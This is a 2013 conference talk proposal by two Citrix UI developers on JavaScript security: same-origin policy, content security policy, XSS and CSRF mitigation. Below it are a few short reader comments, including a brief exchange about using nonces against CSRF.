by Raghu Mitra (@raghumitra) on Thursday, 18 July 2013

+24
Vote on this proposal
Status: Submitted
Section
Full talk

Technical level
Intermediate

Objective

Learn about the common security vulnerabilities, policies and how to work with them in javascript.

Description

Almost everybody who has written some serious javascript code would have faced problems related to security.
There are some inherent security policies in javascript such as single-origin-policy, content-security-policy etc, which sometimes are limiting.
In this session we will discuss how to work around them, should there be any need.

Even after the security policies mentioned above, programmers need to take care of many other vulnerabilities like cross-site-scripting (XSS), cross-site-request-forgery ( CSRF) etc.
In this session we will discuss how to fill these security loop holes.

Speaker bio

Raghu & Rahul
We are SSE's working for Citrix R&D India Ltd. We work on providing UI for a bunch of networking products. Developing UI for an enterprise networking product that can be public facing sometimes has given us exposure to various security threats and by far we were successful in mitigating them :).

We would like to share our knowledge and understand more about the common security issues faced by enterprise web applications.

Comments

  • 2
    [-] Om Shankar (@omshiv) 4 years ago

    Agree. JS is so approachable that any tom dick and harry can write code. Secure coding is something really important today, given that JS is everywhere right now.

    • 1
      [-] Raghu Mitra (@raghumitra) Proposer 3 years ago

      Yeah I totally agree with you Om Shankar. This is the first thing that a cool dude kind of a user does when he comes across an interesting web app.
      All of us have to accept that at least once we have attempted to hack into a website/intranetsite using firebug and when we find that the attack fails we would have felt good about the developer :)

  • 2
    [-] Akash Mahajan (@makash) 3 years ago

    How will JavaScript allow you to protect against CSRF?

    • 1
      [-] Raghu Mitra (@raghumitra) Proposer 3 years ago

      Sorry for the delayed response...
      If you have a client JS and by using a methodology called no-once this can be done.
      There are multiple types of no-once checks that can be employed depending on kind of application we are dealing with.
      No to mention we need some support from the server side for this but i am sure it should be simple enough for any kind of server
      HTH

  • 1
    [-] Raghu K Mittal (@raghukmittal) 3 years ago

    Looking forward to this talk

  • 0
    [-] Raghu Mitra (@raghumitra) Proposer 4 years ago

    I hope this will be useful for the folks attending jsfoo

Login with Twitter or Google to leave a comment